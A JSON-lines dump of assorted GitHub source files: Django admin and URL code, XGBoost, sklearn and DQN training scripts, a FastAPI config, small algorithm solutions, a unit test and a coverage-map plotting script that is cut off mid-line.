+{"seq_id":"33312935639","text":"from django.contrib import admin\nfrom .models import Specification\n\n# Register your models here.\n\nclass NotifyAdmin(admin.ModelAdmin):\n list_display = ('id','user_id','name', 'created_date','brand','model','body_style','fuel','transmission','color','year','milage','min_price','max_price')\n list_display_links = ('user_id','name')\n search_fields = ('user_id','name')\n\n readonly_fields=[\n 'user_id',\n 'name', \n 'created_date',\n 'brand',\n 'model',\n 'body_style',\n 'fuel',\n 'transmission',\n 'color',\n 'year',\n 'milage',\n 'min_price',\n 'max_price',\n ]\n\nadmin.site.register(Specification, NotifyAdmin)\n","repo_name":"codesentry17/thisIsEverything","sub_path":"notify/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14915086661","text":"# decision tree for multioutput regression\nfrom scipy.sparse import data\nfrom sklearn.datasets import make_regression\nfrom xgboost import XGBRegressor\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom sklearn.model_selection import train_test_split as ttsplit\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np \nfrom copy import deepcopy\nimport pandas as pd\n# import warnings filter\nfrom warnings import simplefilter\nfrom hyperopt import STATUS_OK, Trials, fmin, hp, tpe\n\n\nimport ast\n\ndef convert_list_string_to_list_float(strings):\n # Converting string to list\n values = []\n for s in strings:\n value = []\n for x in s.split( ):\n try:\n value.append(float(x.strip(' []')))\n except:\n pass\n values.append(value)\n return values\n\n# ignore all future warnings\nsimplefilter(action='ignore')\n\nclass XGBRegressor(XGBRegressor):\n def partial_fit(self, X, y, *params):\n super().fit(X, y,*params, xgb_model=super().get_booster())\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\n\ndef get_dataset(path):\n dataset = pd.read_csv(path,';')\n\n rewards = dataset['reward']\n obs = convert_list_string_to_list_float(dataset[\"actual_state\"])\n next_obs = convert_list_string_to_list_float(dataset[\"next_state\"])\n actions = dataset['action']\n\n targets_f = np.zeros((len(obs),26))\n \n for i, action in enumerate(actions):\n targets_f[i][action] = rewards[i]\n\n X, y = np.array(obs),targets_f\n return X,y\n\ndef split_test(X,y):\n X,Xt,y,yt = ttsplit(X, y, test_size=0.33, random_state=42)\n\n X_ = []\n y_ = []\n for _,y_index in KFold(n_splits=4).split(X):\n X_.append(X[y_index])\n y_.append(y[y_index])\n\n # define model\n model = MultiOutputRegressor(XGBRegressor())\n model2 = MultiOutputRegressor(XGBRegressor())\n\n print(\"Test 1\")\n model.fit(X, y)\n # make a prediction\n print(\"\\tFit all X and y:\",mean_squared_error(yt,model.predict(Xt)))\n\n model2.fit(X_[0], y_[0] )\n model3 = deepcopy(model2)\n # make a prediction\n print(\"\\tFit only X_[0] and y_[0]:\",mean_squared_error(yt,model2.predict(Xt)))\n\n model3.partial_fit(X_[1], y_[1] )\n model4 = deepcopy(model3)\n # make a prediction\n print(\"\\tFit partial X_[1] and y_[1]:\",mean_squared_error(yt,model3.predict(Xt)))\n\n model4.partial_fit(X_[2], y_[2] )\n model5 = deepcopy(model4)\n # make a prediction\n print(\"\\tFit partial X_[2] and y_[2]:\",mean_squared_error(yt,model4.predict(Xt)))\n\n model5.partial_fit(X_[3], y_[3] )\n # make a prediction\n print(\"\\tFit partial X_[3] and y_[3]:\",mean_squared_error(yt,model5.predict(Xt)))\n\n print(\"Test 2\")\n\n # define model\n model = MultiOutputRegressor(XGBRegressor())\n model2 = MultiOutputRegressor(XGBRegressor())\n\n # fit all the model\n model.fit(X, y)\n # make a prediction\n print(\"\\tFit all X and y:\",mean_squared_error(yt,model.predict(Xt)))\n\n model2.fit(flatten(X_[0:1]), flatten(y_[0:1]) )\n model3 = deepcopy(model2)\n # make a prediction\n print(\"\\tFit only X_[0:1] and y_[0:1]:\",mean_squared_error(yt,model2.predict(Xt)))\n\n model3.partial_fit(flatten(X_[0:2]),flatten(y_[0:2]))\n model4 = deepcopy(model3)\n # make a prediction\n print(\"\\tFit partial X_[0:2] and y_[0:2]:\",mean_squared_error(yt,model3.predict(Xt)))\n\n model4.partial_fit(flatten(X_[1:3]), flatten(y_[1:3]) )\n model5 = deepcopy(model4)\n # make a prediction\n print(\"\\tFit partial X_[1:3] and y_[1:3]:\",mean_squared_error(yt,model4.predict(Xt)))\n\n model5.partial_fit(flatten(X_[2:4]), flatten(y_[2:4] ))\n # make a prediction\n print(\"\\tFit partial X_[2:4] and y_[2:4]:\",mean_squared_error(yt,model5.predict(Xt)))\n\n\ndef objective(space):\n\n global X,Xt,y,yt \n\n clf=MultiOutputRegressor(XGBRegressor(\n n_estimators = int(space['n_estimators']), max_depth = int(space['max_depth']), gamma = space['gamma'],\n reg_alpha = space['reg_alpha'],reg_lambda = space['reg_lambda'],min_child_weight=space['min_child_weight']))\n\n clf.fit(X, y,verbose=False)\n \n pred = clf.predict(Xt)\n accuracy = mean_squared_error(yt, pred)\n print (\"SCORE:\", accuracy)\n return {'loss': accuracy, 'status': STATUS_OK }\n\ndef hypertune_parameters():\n # import packages for hyperparameters tuning\n\n\n space={'max_depth': hp.quniform(\"max_depth\", 3, 20, 1),\n 'gamma': hp.uniform ('gamma', 1,9),\n 'reg_alpha' : hp.quniform('reg_alpha', 40,180,1),\n 'reg_lambda' : hp.uniform('reg_lambda', 0,1),\n 'colsample_bytree' : hp.uniform('colsample_bytree', 0.5,1),\n 'min_child_weight' : hp.quniform('min_child_weight', 0, 10, 1),\n 'n_estimators': hp.quniform(\"n_estimators\", 100, 200, 5) ,\n 'seed': 0\n }\n\n trials = Trials()\n\n best_hyperparams = fmin(fn = objective,\n space = space,\n algo = tpe.suggest,\n max_evals = 500,\n trials = trials)\n\n print(best_hyperparams)\n pass\n\n\nX_data,y_data = get_dataset(\"../agent/configs_xqn/buffer.csv\")\nX,Xt,y,yt = ttsplit(X_data, y_data, test_size=0.30, random_state=42)\n\nprint(f\"Tamanho dos dados de treino: {len(X)}\")\nprint(f\"Tamanho dos dados de teste: {len(Xt)}\")\n\n#split_test(X,y)\nhypertune_parameters()\n\n","repo_name":"LincolnVS/explainable-drl-traffic-lights","sub_path":"scripts/xgboost_teste.py","file_name":"xgboost_teste.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"91"}
+{"seq_id":"9636322289","text":"\"\"\"\n@Time : 2021/11/16 13:58\n@Author : Musuer\n@Contact : linxuzhao2018@163.com\n@File : config.py\n@Software: PyCharm\n\"\"\"\n# 生产模式为 1 线上 0 本地\nPRODUCT = 0\n# 启动模式\nRUN_DEBUG: bool = False if PRODUCT else True\n\n# 使用 uvion 项目启动配置\nAPP_RUN_CONFIG = {\n 'host': '0.0.0.0', # 启动 host\n 'port': 81, # 启动 port 端口\n 'reload': RUN_DEBUG # 是否已 reload 模式启动 默认与当前生产模式有关`\n}\n\n# swagger_ui 设置\nSWAGGER_UI = {\n 'title': 'FastApiProject', # 标题\n 'version': 'v1',\n # description 使用 markdown 语法\n 'description': '''# 项目描述\n......\n ''', # 描述\n 'docs_url': '/openapi/docs', # openapi 文档地址 默认为 docs 此处修改为 /openapi/docs\n 'openapi_url': '/openapi/openapi.json', # 文档关联请求数据接口\n 'redoc_url': '/openapi/redoc', # redoc 文档\n # 'terms_of_service': 'http://example.com/terms/',\n # 'contact': {\n # \"name\": \"Deadpoolio the Amazing\",\n # \"url\": \"http://x-force.example.com/contact/\",\n # \"email\": \"dp@x-force.example.com\",\n # },\n 'license_info': {\n \"name\": \"Apache 2.0\",\n \"url\": \"https://www.apache.org/licenses/LICENSE-2.0.html\",\n },\n # 接口描述\n 'openapi_tags': [\n {\n \"name\": \"test\",\n \"description\": \"openapi docs 中该接口的描述\",\n # \"externalDocs\": { # 额外三方 url\n # \"description\": \"Items external docs\",\n # \"url\": \"https://fastapi.tiangolo.com/\",\n # },\n },\n\n ]\n}\n\n# jwt 密钥\nSECRET_KEY = \"xxxxxxxxxxxxxx\"\n# 加密方式\nALGORITHM = \"HS256\"\n\n# 数据库地址 用户名:密码@主机:端口/数据库名\nDATABASE_URLS = {\n 'default': {\n 'user': '这里是用户名',\n 'password': '这里是用户密码',\n 'host': (PRODUCT == 1) and '127.0.0.1' or 'x.x.x.x', # 此处 host 自行设计若服务与mysql同属一个服务器可以采取\n 'port': 3306,\n 'database': '选择的数据库',\n 'charset': 'utf8mb4',\n },\n 'app_1_db': {\n 'user': 'root',\n 'password': 'xxxx',\n 'host': '127.0.0.1',\n 'port': 3306,\n 'database': 'cps',\n 'charset': 'utf8mb4',\n }\n}\n\n# redis 链接\nREDIS_URL = \"redis://127.0.0.1:6379/1\"\n\n# tortoise-orm 配置可以获取上方\nTORTOISE_ORM = {\n 'connections': {\n # # Dict format for connection\n # 'default': {\n # 'engine': 'tortoise.backends.mysql',\n # 'credentials': DATABASE_URLS.get('default')\n # },\n 'app_1': {\n 'engine': 'tortoise.backends.mysql',\n 'credentials': DATABASE_URLS.get('app_1_db')\n },\n },\n 'apps': {\n 'models': {\n # 'models': ['aerich.models', 'app_1.orm.models'],\n 'models': ['aerich.models', 'FastApiProject.orm.models'],\n # If no default_connection specified, defaults to 'default'\n 'default_connection': 'app_1', # connections中的配置默认\n }\n }\n}\n\n# 时区\nTIME_ZONE = 'Asia/Shanghai' # 数据库返回接口时使用\n","repo_name":"ItGarbager/FastApiProject","sub_path":"FastApiProject/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"13452181357","text":"import os\nimport sys\nfrom dataclasses import dataclass\n\nfrom sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier, RandomForestClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import classification_report\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import Ridge\nfrom xgboost import XGBClassifier\nfrom catboost import CatBoostClassifier\nfrom sklearn.metrics import accuracy_score\n\n\nfrom src.exception import CustomException\nfrom src.logger import logging\nfrom src.utils import save_object, evaluate_models\n\n@dataclass\nclass ModelTrainerConfig:\n trained_model_file_path = os.path.join('artifacts','model.pkl')\n\nclass ModelTrainer:\n def __init__(self):\n self.model_trainer_config = ModelTrainerConfig()\n\n def initiate_model_trainer(self,input_train_array,input_test_array,target_train_array,target_test_array):\n try:\n logging.info(\"Splitting training and test input\")\n\n X_train, y_train, X_test, y_test = (\n input_train_array,\n target_train_array,\n input_test_array,\n target_test_array\n )\n\n print(\"X_train shape : \",X_train.shape)\n print(\"y_train shape :\", y_train.shape)\n\n models = {\n \"Naive Bayes\" : MultinomialNB(),\n \"Gradient Boosting\" : GradientBoostingClassifier(),\n \"Random Forest Classifier\" : RandomForestClassifier(),\n \"CatBoost Classifier\" : CatBoostClassifier(verbose = False),\n \"XGBoost Classifier\" : XGBClassifier(),\n \"Ridge\" : Ridge(),\n \"Ada Boost Regressor\" : AdaBoostClassifier(),\n \"KNeighbors Classifier\" : KNeighborsClassifier()\n }\n\n # params = {\n # \"Naive Bayes\": {\n # \"alpha\": [0.1, 1.0, 10.0]\n # },\n # \"Gradient Boosting\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"Random Forest Classifier\": {\n # \"n_estimators\": [50, 100, 200],\n # \"max_depth\": [None, 10, 20],\n # \"min_samples_split\": [2, 5, 10]\n # },\n # \"CatBoost Classifier\": {\n # \"iterations\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"XGBoost Classifier\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"Ridge\": {\n # \"alpha\": [0.01, 0.1, 1.0]\n # },\n # \"Ada Boost Regressor\": {\n # \"n_estimators\": [50, 100, 200],\n # \"learning_rate\": [0.01, 0.1, 0.2]\n # },\n # \"KNeighbors Classifier\": {\n # \"n_neighbors\": [3, 5, 7],\n # \"weights\": [\"uniform\", \"distance\"]\n # }\n # }\n\n model_report:dict = evaluate_models(X_train = X_train, y_train = y_train,\n X_test = X_test, y_test = y_test, models = models)\n \n best_model_score = max(sorted(model_report.values()))\n best_model_name = list(model_report.keys())[\n list(model_report.values()).index(best_model_score)\n ]\n best_model = models[best_model_name]\n\n if best_model_score < 0.6:\n raise CustomException(\"No best model found\")\n \n logging.info(\"Best found model on both training and testing dataset\")\n\n save_object(\n file_path=self.model_trainer_config.trained_model_file_path,\n obj=best_model\n )\n\n predicted = best_model.predict(X_test)\n best_report = accuracy_score(y_test, predicted)\n print(\"The best model was :\", best_model_name, \" with an accuracy of\")\n return best_report\n\n\n\n except Exception as e:\n raise CustomException(e,sys)\n","repo_name":"ani7fx/ecom-sentiment-analysis","sub_path":"src/components/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2311169752","text":"# program to find the largest of number in the iterable with time complexity theta(n)\n# it will use two traversals\nlist_of_numbers = [4, 3, 2, 1]\n\n\ndef function_to_find_largest_number_with_theta_n(iterable):\n \"\"\"\n :param iterable:\n :return: largest number from the list\n since one loops are involved and one is inner loop \\\n where n = length of list hence the time complexity is theta (n)\n \"\"\"\n\n comparing_value = iterable[0]\n n = len(iterable)\n if not n:\n return None\n for i in range(1, n):\n if iterable[i] > comparing_value:\n comparing_value = iterable[i]\n return comparing_value\n\n\n# traversal 1\nlargest_number = function_to_find_largest_number_with_theta_n(list_of_numbers)\nsecond_largest = None\nfor i in list_of_numbers:\n if i != largest_number:\n if second_largest is None:\n second_largest = i\n else:\n second_largest = max(second_largest, i) # traversal 2\n\nprint(\"Second_largest number is: {}\".format(second_largest))\n\n# efficient solution to handle the above case with one traversal\n# case 1:\n# suppose we get the largest and second largest from the list from l0 to ln-1 \\\n# comparsion is made between ln-1 and ln. if ln is > ln-1 then largest becomes ln\n# case 2:\n# suppose we get the largest and second largest from the list from l0 to ln-1 \\\n# comparsion is made between ln-1 and ln. if ln is < ln-1\n# case 2.1\n# if ln > second_largest\n# second_largest = ln\n# case 2.2\n# if ln < second_largest or second largest is none \\\n# ignore in this case\n# case 3\n# if ln == ln-1 then also ignore this case\n\n\ndef second_largest_with_one_traversal(iterable):\n if len(iterable) <= 1:\n return None\n lar = iterable[0]\n slar = None\n for x in iterable[1:]:\n if x > lar:\n slar = iterable[0]\n lar = x\n elif x != lar:\n if slar is None or slar < x:\n slar = x\n return slar\n\n\nsecond_largest = second_largest_with_one_traversal(iterable=list_of_numbers)\nprint(\"Second_largest number is: {}\".format(second_largest))\n\n","repo_name":"sanpreet/Python-basics-code","sub_path":"second_largest_with_time_complexity.py","file_name":"second_largest_with_time_complexity.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20721145006","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^update/(?P\\d+)/$', views.CompanyUpdateView.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'^add/$', views.add, name='add'),\n url(r'^save/$', views.save, name='save'),\n]\n","repo_name":"hekaber/companies_site","sub_path":"companies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39829664992","text":"class Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key\ndef insert(root,node):\n if root is None:\n root=node\n else:\n if root.val0:\n h=res.pop(0)\n print(h.val,end=' ')\n if h.left:\n res.append(h.left)\n if h.right:\n res.append(h.right)\n g-=1\n print(' ')\n print() \nt=int(input())\nfor i in range(t):\n n=int(input())\n lst=list(map(int,input().split()))\n r=Node(lst[0])\n for i in range(1,n):\n insert(r,Node(lst[i]))\n levelorder(r)\n","repo_name":"keerthi4600/Smarthinterviews-hackerrank-python","sub_path":"Level order of tree.py","file_name":"Level order of tree.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32250404390","text":"class Solution:\n def canChoose(self, groups: List[List[int]], nums: List[int]) -> bool:\n i = 0\n for grp in groups:\n for j in range(i, len(nums)):\n if nums[j:j+len(grp)] == grp:\n i = j+len(grp)\n break\n else:\n return False\n return True\n ","repo_name":"monishshah18/Leetcode","sub_path":"form-array-by-concatenating-subarrays-of-another-array/form-array-by-concatenating-subarrays-of-another-array.py","file_name":"form-array-by-concatenating-subarrays-of-another-array.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"33574742498","text":"from sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.inspection import inspect\n\ndef criaModelo():\n engine = create_engine(\"postgresql+psycopg2://postgres:admim@localhost:5432/teste\", echo=False)\n\n base = automap_base()\n\n base.prepare(engine, schema=\"northwind\", reflect=True)\n\n print(base.classes.keys())\n categories = base.classes.categories;\n shippers = base.classes.shippers;\n suppliers = base.classes.suppliers;\n employees = base.classes.employees;\n orders = base.classes.orders;\n customers = base.classes.customers;\n order_details = base.classes.order_details;\n products = base.classes.products;\n print(orders.keys())\n\n\n\ncriaModelo();\n","repo_name":"Danielhfc/DesenvolvimentoWeb","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42753563182","text":"from typing import List\n\nclass Solution:\n def destCity(self, paths: List[List[str]]) -> str:\n cities = set()\n\n for path in paths:\n cities.add(path[0])\n\n for path in paths:\n dest = path[1]\n if dest not in cities:\n return dest \n return \"\"\npaths = [[\"London\",\"New York\"],[\"New York\",\"Lima\"],[\"Lima\",\"Sao Paulo\"]]\nsol1 = Solution()\nresult = sol1.destCity(paths)\nprint(result)","repo_name":"GiacomoComitani/leetcode","sub_path":"problems/1436.destination.city/destCity.py","file_name":"destCity.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"14019440486","text":"from stable_baselines3 import DQN\nfrom stable_baselines3.common.env_util import make_atari_env\nfrom stable_baselines3.common.vec_env import VecFrameStack\nimport torch\nimport config\nimport wandb\nfrom wandb.integration.sb3 import WandbCallback\nfrom utils import unzip_file, CustomWandbCallback\nimport os\n\n\n\n'''\nSet up the appropriate directories for logging and saving the model\n'''\nos.makedirs(config.log_dir, exist_ok=True)\nos.makedirs(config.save_path, exist_ok=True)\n\n#Create the callback that logs the mean reward of the last 100 episodes to wandb\ncustom_callback = CustomWandbCallback(config.check_freq, config.save_path)\n\n\n'''\nSet up loging to wandb\n'''\n#Set wandb to log the training process\nif config.log_to_wandb:\n #Set wandb to log the training process\n wandb.init(project=config.project_train, entity = config.entity, name=config.name_train, notes=config.notes, sync_tensorboard=config.sync_tensorboard)\n #wandb_callback is a callback that logs the training process to wandb, this is done because wandb.watch() does not work with sb3\n wandb_callback = WandbCallback()\n\n\n'''\nSet up the environment\n'''\n# Create multiple environments and wrap them correctly\nenv = make_atari_env(\"BreakoutNoFrameskip-v4\", n_envs=config.n_envs, seed=config.seed)\nenv = VecFrameStack(env, n_stack=config.n_stack)\n\n\n'''\nSet up the model\n'''\n#Create the model with the parameters specified in config.py, go to config.py to see the meaning of each parameter in detail\nmodel = DQN(policy=config.policy,\n env=env, \n learning_rate=config.learning_rate,\n buffer_size=config.buffer_size,\n learning_starts=config.learning_starts, \n batch_size=config.batch_size,\n tau=config.tau,\n gamma=config.gamma,\n train_freq=config.train_freq,\n gradient_steps=config.gradient_steps,\n replay_buffer_class=config.replay_buffer_class,\n replay_buffer_kwargs=config.replay_buffer_kwargs,\n optimize_memory_usage=config.optimize_memory_usage,\n target_update_interval=config.target_update_interval,\n exploration_fraction=config.exploration_fraction,\n exploration_initial_eps=config.exploration_initial_eps,\n exploration_final_eps=config.exploration_final_eps,\n max_grad_norm=config.max_grad_norm,\n tensorboard_log=config.log_dir,\n policy_kwargs=config.policy_kwargs,\n verbose=config.verbose,\n seed=config.seed,\n device=config.device,\n _init_setup_model=config._init_setup_model)\n \n\nprint(\"model in device: \", model.device)\n\n#Load the model if config.pretrained is set to True in config.py\nif config.pretrained:\n model = DQN.load(config.saved_model_path, env=env, verbose=config.verbose, tensorboard_log=config.log_dir)\n #Unzip the file a2c_Breakout_1M.zip and store the unzipped files in the folder DQN_Breakout_unzipped\n unzip_file(config.saved_model_path, config.unzip_file_path) \n model.policy.load_state_dict(torch.load(os.path.join(config.unzip_file_path, \"policy.pth\")))\n model.policy.optimizer.load_state_dict(torch.load(os.path.join(config.unzip_file_path, \"policy.optimizer.pth\")))\n\n'''\nTrain the model and save it\n'''\n#model.learn will train the model for 1e6 timesteps, timestep is the number of actions taken by the agent, \n# in a game like breakout, the agent takes an action every frame, then the number of timesteps is the number of frames,\n# which is the number of frames in 1 game multiplied by the number of games played.\n#The average number of frames in 1 game is 1000, so 1e6 timesteps is 1000 games more or less.\n#log_interval is the number of timesteps between each log, in this case, the training process will be logged every 100 timesteps.\n#callback is a callback that logs the training process to wandb, this is done because wandb.watch() does not work with sb3\n\nif config.log_to_wandb:\n model.learn(total_timesteps=config.total_timesteps, log_interval=config.log_interval, callback=[wandb_callback, custom_callback], progress_bar=True)\nelse:\n model.learn(total_timesteps=config.total_timesteps, log_interval=config.log_interval, callback=[custom_callback], progress_bar=True)\n\n#Save the model \nmodel.save(config.saved_model_path[:-4]) #remove the .zip extension from the path\n\n''' \nClose the environment and finish the logging\n'''\nenv.close()\nif config.log_to_wandb:\n wandb.finish() \n","repo_name":"Neilus03/Learn2Earn_RL","sub_path":"BreakOut/Breakout_sb3_DQN/train_DQN.py","file_name":"train_DQN.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"12696022437","text":"'''\nBusiest Time in The Mall\n\nThe Westfield Mall management is trying to figure out what the busiest moment\nat the mall was last year. You’re given data extracted from the mall’s door\ndetectors. Each data point is represented as an integer array whose size is\n3. The values at indices 0, 1 and 2 are the timestamp, the count of visitors,\nand whether the visitors entered or exited the mall (0 for exit and 1 for\nentrance), respectively. Here’s an example of a data point: [ 1440084737, 4,\n0 ].\n\nNote that time is given in a Unix format called Epoch, which is a nonnegative\ninteger holding the number of seconds that have elapsed since 00:00:00 UTC,\nThursday, 1 January 1970.\n\nGiven an array, data, of data points, write a function findBusiestPeriod that\nreturns the time at which the mall reached its busiest moment last year. The\nreturn value is the timestamp, e.g. 1480640292. Note that if there is more\nthan one period with the same visitor peak, return the earliest one.\n\nAssume that the array data is sorted in an ascending order by the timestamp.\nExplain your solution and analyze its time and space complexities.\n\nExample:\n\ninput: data = [ [1487799425, 14, 1], \n [1487799425, 4, 0],\n [1487799425, 2, 0],\n [1487800378, 10, 1],\n [1487801478, 18, 0],\n [1487801478, 18, 1],\n [1487901013, 1, 0],\n [1487901211, 7, 1],\n [1487901211, 7, 0] ]\n\noutput: 1487800378 # since the increase in the number of people\n # in the mall is the highest at that point\n\nConstraints:\n\n [time limit] 5000ms\n\n [input] array.array.integer data\n 1 ≤ data.length ≤ 100\n\n [output] integer\n'''\n\n# Two-pass, O(n) solution:\n# Step 1:\n# Initialise a dictionary of [Timestamp]: int which is the numebr of people who entered at that timestamp (can be negative)\n# Go down the array\n# If timestamp in timestamp_dict:\n# plus or minus\n# Else then we create a new entry\n\n# Step 2:\n# Go through the dictionary, keep a running count, and then return the timestamp with the highest count\n\n\ndef find_busiest_period(data):\n last_timestamp = data[0][0]\n peak_timestamp = data[0][0]\n peak_visitors = 0\n curr_visitors = 0\n for (timestamp, number, io) in data:\n # If timestamp == last_timestamp, then we append number to curr_visitors\n # Otherwise, we set last_timestamp = timestamp and we set curr_visitors = number\n # -number if io == 0, number otherwise\n delta_visitors = number if io else -number\n if timestamp == last_timestamp:\n curr_visitors += delta_visitors\n else:\n if peak_visitors < curr_visitors:\n peak_visitors = curr_visitors\n peak_timestamp = last_timestamp\n\n last_timestamp = timestamp\n curr_visitors += delta_visitors\n\n if peak_visitors < curr_visitors:\n peak_visitors = curr_visitors\n peak_timestamp = last_timestamp\n\n return peak_timestamp\n\n\n'''\n# [[0,5,1]] \n => timestamp = last_timestamp \n curr_visitors += delta_visitors # curr_visitors = 5\n peak_visitors = 5\n \n return 5\n \n[0 14, 1], \n[0, 4, 0],\n[0 2, 0],\n[1, 10, 1],\n\nlast_timestamp = 0, peak, current = 0\n\nfor loop:\n [0, 14, 1]\n delta = 14\n timestamp IS EQUAL == last_timestamp:\n curr += delta # curr = 14\n peak = 0\n \n [1,4,0]\n delta = -4\n timestamp NIS EQUAL \n curr += delta # curr = 10\n peak not updated\n \n [0,2,0]\n delta = -2\n curr += delta # curr = 8\n peak not updated\n \n [1,10,1]\n delta = 1\n peak = curr = 8\n last_timestamp = 1\n curr_visitors = 9\n\n'''\n\ndata = [[1487799425, 14, 1],\n [1487799425, 4, 0],\n [1487799425, 2, 0],\n [1487800378, 10, 1],\n [1487801478, 18, 0],\n [1487801478, 18, 1],\n [1487901013, 1, 0],\n [1487901211, 7, 1],\n [1487901211, 7, 0]]\nprint(find_busiest_period(data)) # 1487800378\n","repo_name":"lieuzhenghong/programming-practice","sub_path":"problems/pramp_busiest_time.py","file_name":"pramp_busiest_time.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5785444557","text":"import unittest\nimport json\nfrom unittest.mock import patch, Mock\nfrom models import get_users_data\n\n\nclass TestGet20Users(unittest.TestCase):\n\n @patch('requests.get')\n def test_successful_response(self, mock_get):\n # Mocking a successful response\n mock_response = Mock()\n mock_response.status_code = 200\n mock_data = {\n \"total\": 217,\n \"data\": [{\"nickname\": \"Alice\", \"isOnline\": True, \"lastSeenDate\": None},\n {\"nickname\": \"Bob\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-25T10:30:00+00:00\"},\n {\"nickname\": \"Snack\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-24T10:30:00+00:00\"},\n {\"nickname\": \"Nick\", \"isOnline\": False, \"lastSeenDate\": \"2023-09-26T12:00:00+00:00\"}]\n }\n mock_response.json.return_value = mock_data\n mock_response.text = json.dumps(mock_data) # mock the .text attribute\n mock_get.return_value = mock_response\n\n # Calling the function\n result = get_users_data({'offset': 0})\n\n # Asserting the result\n self.assertEqual(len(result), 4)\n self.assertEqual(result[0]['nickname'], \"Alice\")\n self.assertEqual(result[1]['nickname'], \"Bob\")\n self.assertEqual(result[2]['nickname'], \"Snack\")\n self.assertEqual(result[3]['nickname'], \"Nick\")\n\n @patch('requests.get')\n def test_failed_response(self, mock_get):\n # Mocking a failed response\n mock_response = Mock()\n mock_response.status_code = 400\n mock_get.return_value = mock_response\n\n # Calling the function\n result = get_users_data({'offset': 0})\n\n # Asserting the result\n self.assertEqual(result, [])\n","repo_name":"YaroslavKSE/Last_seen_Task","sub_path":"TestGetUsers.py","file_name":"TestGetUsers.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"1867882049","text":"import argparse\nimport cv2\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\n\nscale = 3\nwidth = 101\nheight = 101\ncoverage_diameter = 6\n\n\ndef plot_sim():\n args = get_parser()\n data_path = Path(args.json_path_data)\n data = json.load(open(data_path, \"r\"))\n\n image = np.zeros((width, height, 3), dtype=np.uint8)\n\n ltime = []\n time_offset = int(list(data.keys())[0])\n covered_percentage = []\n\n for time in data:\n ltime.append(int(time) - time_offset)\n\n for id in data[time]:\n lx = np.array([i[\"position_x\"] for i in data[time][id]])\n lx = (lx + width / 2).astype(int) # To image coordinates\n ly = np.array([i[\"position_y\"] for i in data[time][id]])\n ly = (ly + height / 2).astype(int) # To image coordinates\n\n for x, y in zip(lx, ly):\n if out_of_bounds(x, y):\n continue\n cv2.circle(image, (x, y), coverage_diameter, (255, 255, 255), -1)\n\n covered_pixels = 0\n for row in image:\n for pixel in row:\n if pixel[0] == 255:\n covered_pixels += 1\n\n covered_percentage.append((covered_pixels / (width * height)) * 100)\n\n image = cv2.resize(\n image, (width * scale, height * scale), interpolation=cv2.INTER_LINEAR\n )\n\n if not cv2.imwrite(\"src/data_logging/plots/coveragemap.jpg\", cv2.flip(image, 0)):\n raise Exception(\"Could not write image\")\n\n # Remove last entries, which are likely incomplete\n ltime.pop()\n covered_percentage.pop()\n\n plt.plot(ltime, covered_percentage, \"r\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Coverage (%)\")\n plt.title(\"Accumulative Coverage\")\n plt.axhline(y=95, linestyle=\":\")\n plt.grid()\n plt.savefig(str(data_path.with_suffix(\"\")) + \"coverage_percentage_plot.png\")\n plt.close()\n\n\ndef out_of_bounds(px_x, px_y):\n if px_x < 0 or px_x >= width:\n return True\n if px_y < 0 or px_y >= height:\n return True\n return False\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n prog=\"plot_json_coveragemap\",\n description=\"Plot 